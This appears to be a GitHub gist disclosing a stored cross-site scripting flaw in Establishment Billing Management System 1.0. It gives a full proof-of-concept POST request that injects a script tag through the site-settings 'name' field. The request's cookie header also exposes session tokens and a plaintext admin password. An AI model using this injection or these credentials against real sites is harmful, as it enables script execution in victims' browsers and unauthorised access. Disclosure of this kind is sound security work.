Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/sourcecodester_Establishment Billing Management System_XSS_1.md Secret

Last active July 29, 2024 02:23
Show Gist options
  • Save topsky979/e2fa238262fcafdd8e301c32ee9f8e3a to your computer and use it in GitHub Desktop.
Save topsky979/e2fa238262fcafdd8e301c32ee9f8e3a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sourcecodester_Establishment Billing Management System_XSS_1.md

[description]

Establishment Billing Management System was discovered to contain a XSS vulnerability via the URI /admin/ajax.php?action=save_settings.

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

https://www.sourcecodester.com/php/14497/establishment-billing-management-system-using-phpmysql-source-code.html

[Affected Product Code Base]

1.0

[Impact Escalation of Privileges]

true

[POC]
request payload(Pls be aware of the name field):

POST /ajax.php?action=save_settings HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 601
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryywv3ARq03NtUyflM
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; PHPSESSID=git91lpt9et0atu8q4dg73890i; SESSIONID=84fddaa1-6f23-4ebf-b2d5-d69ffb8f4ca3.si0YTPb5ZULv7CJZ8PxxFgocWgs; request_token=ro0mHsPqA65198aPlmVMBVmI2GD6ltWERhyREaJpOKy9NuaC; layers=3; Path=/www/wwwroot/111.com; BatchSelected=null; vcodesum=9
Connection: keep-alive

------WebKitFormBoundaryywv3ARq03NtUyflM
Content-Disposition: form-data; name="name"

Sample Establishment"/><script>alert(11)</script>
------WebKitFormBoundaryywv3ARq03NtUyflM
Content-Disposition: form-data; name="contact"

+1234567899
------WebKitFormBoundaryywv3ARq03NtUyflM
Content-Disposition: form-data; name="address"

Sample Address
------WebKitFormBoundaryywv3ARq03NtUyflM
Content-Disposition: form-data; name="electricity_rate"

15
------WebKitFormBoundaryywv3ARq03NtUyflM
Content-Disposition: form-data; name="water_rate"

10
------WebKitFormBoundaryywv3ARq03NtUyflM--
图片 图片
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment